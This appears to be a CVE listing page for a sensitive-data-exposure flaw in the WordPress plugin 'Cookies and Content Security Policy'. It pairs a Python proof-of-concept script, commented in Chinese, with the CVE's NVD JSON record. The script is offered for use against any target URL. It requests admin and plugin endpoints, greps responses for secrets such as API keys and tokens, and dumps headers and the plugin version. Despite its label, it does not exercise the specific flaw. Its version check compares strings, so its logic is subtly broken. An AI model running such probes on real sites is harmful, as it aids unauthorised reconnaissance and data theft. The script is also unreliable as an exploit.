CVE-2025-63019

# CVE-2025-63019 PoC - WordPress Cookies and Content Security Policy插件敏感数据泄露 # 此PoC演示如何检测和利用该漏洞 import requests import sys import re def check_vulnerability(target_url): """ 检测目标网站是否受CVE-2025-63019影响 """ print(f"[*] 检查目标: {target_url}") # 检查Cookie和CSP相关的端点 endpoints = [ "/", "/wp-admin/admin-ajax.php", "/wp-content/plugins/cookies-and-content-security-policy/", ] sensitive_patterns = [ r'(api_key|secret|token|password|credential)', r'(internal|path|directory|config)', r'(set-cookie|content-security-policy)', ] for endpoint in endpoints: try: url = target_url.rstrip('/') + endpoint print(f"\n[*] 测试端点: {url}") response = requests.get(url, timeout=10, allow_redirects=False) # 检查响应头中是否包含敏感信息 headers_str = str(response.headers) for pattern in sensitive_patterns: matches = re.findall(pattern, headers_str, re.IGNORECASE) if matches: print(f"[!] 发现可疑信息: {matches}") # 检查响应体 for pattern in sensitive_patterns: matches = re.findall(pattern, response.text, re.IGNORECASE) if matches: print(f"[!] 响应体中发现敏感信息: {matches}") except requests.RequestException as e: print(f"[-] 请求失败: {e}") print("\n[*] 检测完成") def extract_sensitive_data(target_url): """ 尝试提取敏感数据 """ print(f"\n[*] 尝试提取敏感数据...") # 获取主页面 try: response = requests.get(target_url, timeout=10) # 分析所有响应头 print("\n[+] 响应头分析:") for key, value in response.headers.items(): print(f" {key}: {value}") # 检查插件相关文件 plugin_urls = [ f"{target_url}/wp-content/plugins/cookies-and-content-security-policy/readme.txt", f"{target_url}/wp-content/plugins/cookies-and-content-security-policy/cookies-and-content-security-policy.php", ] for plugin_url in plugin_urls: try: r = requests.get(plugin_url, timeout=10) if r.status_code == 200: print(f"\n[!] 可访问插件文件: {plugin_url}") # 检查是否包含版本信息 version_match = re.search(r'Version:\s*([\d.]+)', r.text) if version_match: version = version_match.group(1) print(f" 检测到版本: {version}") if version <= "2.34": print(f" [!] 该版本受CVE-2025-63019影响!") except: pass except requests.RequestException as e: print(f"[-] 错误: {e}") if __name__ == "__main__": if len(sys.argv) < 2: print("用法: python cve-2025-63019-poc.py <target_url>") print("示例: python cve-2025-63019-poc.py http://example.com") sys.exit(1) target = sys.argv[1] check_vulnerability(target) extract_sensitive_data(target)

{"cve": {"id": "CVE-2025-63019", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:15:59.667", "lastModified": "2026-04-27T19:16:18.350", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insertion of Sensitive Information Into Sent Data vulnerability in Johan Jonk Stenström Cookies and Content Security Policy cookies-and-content-security-policy allows Retrieve Embedded Sensitive Data.This issue affects Cookies and Content Security Policy: from n/a through <= 2.34."}, {"lang": "es", "value": "Vulnerabilidad de Inserción de Información Sensible en Datos Enviados en Johan Jonk Stenström Cookies and Content Security Policy cookies-and-content-security-policy permite Recuperar Datos Sensibles Incrustados. Este problema afecta a Cookies and Content Security Policy: desde n/a hasta &lt;= 2.34."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-201"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/cookies-and-content-security-policy/vulnerability/wordpress-cookies-and-content-security-policy-plugin-2-34-sensitive-data-exposure-vulnerability?_s_id=cve", "source": "[email protected]"}]}}